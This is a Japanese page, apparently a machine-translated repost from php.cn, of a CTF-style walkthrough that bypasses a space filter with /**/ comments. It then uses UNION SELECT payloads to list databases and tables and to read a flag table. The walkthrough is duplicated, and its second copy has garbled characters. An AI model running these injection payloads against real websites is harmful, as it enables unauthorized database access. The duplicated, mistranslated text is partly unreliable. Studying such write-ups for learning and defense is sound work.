简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
ホームページ > データベース > mysql チュートリアル > 本文

SQLインジェクションに関連する簡単な例

巴扎黑
リリース: 2017-08-11 15:11:05
オリジナル
2842 人が閲覧しました

いわゆる SQL インジェクションとは、Web フォームの送信に SQL コマンドを挿入したり、ページ リクエストのドメイン名やクエリ文字列を入力したりして、最終的にサーバーをだまして悪意のある SQL コマンドを実行させることです。次に、簡単な SQL インジェクションを共有します。一緒に見てみましょう

いわゆる SQL インジェクションとは、Web フォームの送信に SQL コマンドを挿入したり、ドメイン名やページ リクエストのクエリ文字列を入力したりして、最終的にサーバーを騙すことです。悪意のある SQL オーダーを実行します。具体的には、既存のアプリケーションを使用して、(悪意のある) SQL コマンドをバックエンド データベース エンジンに挿入して実行する機能であり、Web フォームに (悪意のある) SQL ステートメントを入力することで、セキュリティ上の脆弱性のある Web サイト上の情報を取得できます。設計者が意図したとおりに SQL ステートメントを実行するよりも、たとえば、以前の多くの映画やテレビの Web サイトでは、主に WEB フォームを通じてクエリ文字を送信することによって VIP メンバーシップのパスワードが漏洩していました。このようなフォームは SQL インジェクション攻撃に対して特に脆弱です。

それぞれ 1、2、および 3 を入力すると、対応する結果が表示されます

' を使用するとエラーが報告されるため、

よく使用される SQL ステートメントを構築します: 1' および '1'='1

応答がありません 試してみてください 1' と '1'='2 を試してください

まだ応答がありません、ツールチップ、何かをフィルタリングしているはずです、SQL ステートメントを変更してみてください

1and1=1

スペースがフィルタリングされていると判断した後、/**/ スペースを置換するには 1'/* を試してください*/'1'='1

結果が見つかりました:

そこで SQL ステートメントを作成しました:

どのデータベースがあるかを判断します: 

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
ログイン後にコピー
ログイン後にコピー

結果を確認できます:

どのようなデータがあるかを確認しますテーブルは次のとおりです: 

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
ログイン後にコピー
ログイン後にコピー

flag テーブルが見つかりました。これは web1 データベースにあるはずで、フィールドは flag (実際にはこのページのデータベース内にあるはずです) です

つまり: 

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
ログイン後にコピー
ログイン後にコピー

私も多くの偉い人のwpを参考にしましたので、書いた後に間違いを指摘していただければ幸いです。

ページのプロンプトによると、具体的には何がフィルタリングされていますか?何がフィルタリングされているかを知ることができます...

それぞれ 1、2、および 3 を入力すると、対応する結果が表示されます

' を使用するとエラーが報告されるため、

よく使用される SQL ステートメントを構築します: 1' と'1'='1

応答なし 試してみてください 1' と '1'='2

まだ応答がありません、ツールチップ、何かをフィルタリングしているはずです、SQL ステートメントを変更してみてください

1and1=1

は、スペースがフィルタリングされているかどうかを判断するには、 /* を使用します。*/そして/**&#&*&#&*/'1'='1

を使用して結果を見つけます:

それで SQL ステートメントを構築します:

どのデータベースが存在するかを確認します: 

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
ログイン後にコピー
ログイン後にコピー

結果を確認できます:


どのようなデータテーブルが存在するかを確認します: 

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
ログイン後にコピー
ログイン後にコピー


が見つかりましたフラグテーブル、これはあるはずだと思います web1 データベースでは、フィールドは flag です (実際にはこのページのデータベース内にあります)

つまり: 

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
ログイン後にコピー
ログイン後にコピー


以上がSQLインジェクションに関連する簡単な例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
関連している 単純
ソース:php.cn
前の記事:SQL クエリ フィールドがステートメントに含まれる問題について話す 次の記事:MySQL tar パッケージの移動と解凍、および mysql ユーザーの作成
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
著者別の最新記事
最新の問題
ダッシュで表のセル値をハイパーリンクにする方法は? (Plotly、Dash、Pandas などの使用) 「JobLink」列の下のセル値をハイパーリンクとして設定したいと考えています。このリンクをクリックすると、新しいタブ/ウィンドウのリンクに移動するはずです。これを達成する方法を教...
から 2023-11-17 18:47:10
0
1
283
セットアップ関数で $vuetify インスタンスにアクセスする方法 設定関数で $vuetify (およびその他の追加されたグローバル) にアクセスする方法はありますか?コンポーザブルにアクセスを許可する方法はありますか? ...setup(){c...
から 2023-11-17 17:47:45
0
1
366
ルートにアクセスする前にルート データをプリロードする最良の方法。 特定のルートのページをレンダリングする前に、まず必要なデータを同期的に取得したいと考えています。理想的にはページコンポーネントでデータを取得したいのですが、ルーターファイルでそれを...
から 2023-11-17 14:54:42
0
2
379
変更時に v-for の選択オプション値としてキーを渡す方法 (VueJS) Vue3とBootstrap5を使用しています。複数のオプションがある選択があります。今、option.TEXT を表示しています。何かを変更すると、この値もメソッドに渡されます。...
から 2023-11-17 08:55:24
0
1
276
XMLファイルに改行文字(改行文字)を追加するにはどうすればよいですか? XML ファイルがあり、次のようにテキスト「サンプル テキスト 123」を折り返したいと考えています。SampleText123 &#xA&#xD\n で言ったこと...
から 2023-11-16 16:42:38
0
1
199
関連トピック
詳細>
人気のおすすめ
人気のチュートリアル
詳細>
関連するチュートリアル
人気のおすすめ
最新のコース
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート
私たちについて 免責事項 Sitemap
PHP中国語ウェブサイト:福祉オンライン PHP トレーニング,PHP 学習者の迅速な成長を支援します!